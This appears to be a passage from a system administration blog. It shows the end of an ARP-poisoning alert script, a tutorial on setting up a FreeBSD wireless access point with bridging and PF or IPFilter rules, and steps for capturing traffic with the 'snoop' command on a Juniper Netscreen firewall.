        arp -an | awk '{print $4}' | sort | uniq -c | grep -v ' 1 ' >> $logpath/arpwatch.log 2>&1
        cat $logpath/arpwatch.log | mail -s 'Potential ARP Poisoning ALERT!' your@email.com
else
echo -e "No potential ARP poisoning instances found..." >> $logpath/arpwatch.log
fi

Simple!

Creating a FreeBSD wireless access point

Access points are essentially wireless switches or hubs. Just like a switch or a hub, all clients communicate through the access point. FreeBSD allows us to easily create an access point with very little configuration and just the right hardware.

To set up a wireless access point using FreeBSD, you need to have a compatible wireless card. We are using a Prism 2-based chipset. For a complete list of cards that are supported, consult the man page for wi, or visit the Wireless Network Interface Section of the FreeBSD documentation site.

Configuring the kernel

How you wish to set up the access point determines what options need to be added to the kernel config file. If the wireless network device is being installed on a server that is currently running as a Firewall/NAT, then we only need to compile the wireless device driver into the kernel:

    # Wireless NIC cards
    device          wlan            # 802.11 support
    device          an              # Aironet 4500/4800 802.11 wireless NICs.
    device          awi             # BayStack 660 and others
    device          wi              # WaveLAN/Intersil/Symbol 802.11 wireless NICs.
    device          wl              # Older non 802.11 Wavelan wireless NIC.

Choose the appropriate driver for your card from the list and include the wlan device, then recompile and install your kernel.

If the wireless network device is going to be installed on a system that does not serve as a Firewall/NAT, then we also want to include the BRIDGE option, along with the appropriate wireless device driver, in the kernel config file.

    # Ethernet bridging support
    options         BRIDGE
    
    # Wireless NIC cards
    device          wlan            # 802.11 support
    device          an              # Aironet 4500/4800 802.11 wireless NICs.
    device          awi             # BayStack 660 and others
    device          wi              # WaveLAN/Intersil/Symbol 802.11 wireless NICs.
    device          wl              # Older non 802.11 Wavelan wireless NIC.
    

The bridging option will allow the wireless device to communicate with the wired ethernet interface. We must also add a couple of options to the /etc/sysctl.conf file in order to establish the bridge between the two interfaces:

    net.inet.ip.forwarding=1
    net.link.ether.bridge.enable=1
    net.link.ether.bridge.config=wi0,fxp0

Be sure to replace fxp0 with whatever wired ethernet interface you are using with your FreeBSD installation. For more information on bridging, consult the Bridging Section of the FreeBSD Handbook.

Configuring the Wireless Interface

The configuration of the wireless interface is fairly straightforward; we just need to add a few more options than we would for a wired ethernet interface. The following is an example of ifconfig options for a wireless interface:

    ifconfig wi0 inet 10.0.0.5 netmask 255.255.255.0 
    ifconfig wi0 ssid My_Network channel 11 media DS/11Mbps mediaopt hostap up stationname "My Network"

Of course this can all be set up in the /etc/rc.conf file so that these settings are retained every time the system boots. From this point, your access point should be up and broadcasting. There are just a couple more options to consider.
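As a rough sketch (the exact rc.conf syntax differs between FreeBSD releases, so treat this as an illustration rather than a drop-in config), the equivalent rc.conf entry could look like :

    ifconfig_wi0="inet 10.0.0.5 netmask 255.255.255.0 ssid My_Network channel 11 media DS/11Mbps mediaopt hostap"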

Post Configuration

As stated earlier, if the wireless interface is installed in a server that is functioning as a Firewall/NAT, then the bridging option is unnecessary. We just need to add a couple of rules to our firewall configuration files to allow traffic to be passed from the wireless interface.

If you are using PF as your Firewall/NAT solution, simply add the following lines to your /etc/pf.conf file:

    pass in on wi0 from wi0:network to any keep state
    pass out on wi0 from any to wi0:network keep state

Replace wi0 with the appropriate interface name of your wireless card.

If you are using IPFilter as your Firewall/NAT solution, then simply add the following lines to your /etc/ipf.rules file:

    pass in on wi0 from any to any keep state
    pass out on wi0 from any to any keep state

Again, replace wi0 with the appropriate interface name of your wireless card.

Administration

Once the access point is configured and operational, we will want to see the clients that are associated with the access point. We can type the following command to get this information:

    root@host# wicontrol -l
    1 station:
    ap[0]:
            netname (SSID):                 [ My_Network ]
            BSSID:                          [ 00:04:23:60:89:d9 ]
            Channel:                        [ 11 ]
            Quality/Signal/Noise [signal]:  [ 0 / 51 / 0 ]
                                    [dBm]:  [ 0 / -98 / -149 ]
            BSS Beacon Interval [msec]:     [ 10 ]
            Capinfo:                        [ ESS ]

Now you should have a complete, functioning access point up and running. You are encouraged to read the wicontrol and wi man pages for further information.

Monitoring raw traffic on a Juniper Netscreen

Occasionally I will run into situations where the only way to definitively diagnose network related problems is to perform raw traffic dumps on a main internal / external interface.

The reasons for needing to do this could be anything. I thought I’d share the quick and easy steps for performing a quick network traffic capture.

Be warned, though, that it is easy to overflow the console buffer and subsequently crash your firewall if you don’t narrow the scope of your capture enough.

There is a command on the Juniper Netscreen console, called “snoop”, that works the same way tcpdump does.

To view the current snoop settings :

    snoop info

To monitor all traffic from a particular IP address going to a particular port :

    snoop filter ip src-ip x.x.x.x dst-port 23

To monitor all traffic on the network going to a particular IP address :

    snoop filter ip dst-ip x.x.x.x

The above commands only SET the filter. You have to turn the filter on and monitor the buffer to actually view the results. Again, make sure the scope of your filters is quite narrow, as there is a risk of overflowing the console buffer and crashing the firewall if you are monitoring too wide a scope.

To view the filters and turn on snoop :

    clear dbuf
    snoop
    get dbuf stream

Don’t forget to clear the filters and the dbuf stream, and to turn off snoop, when you’re done :

    snoop off
    clear dbuf
    snoop filter delete

That’s it!
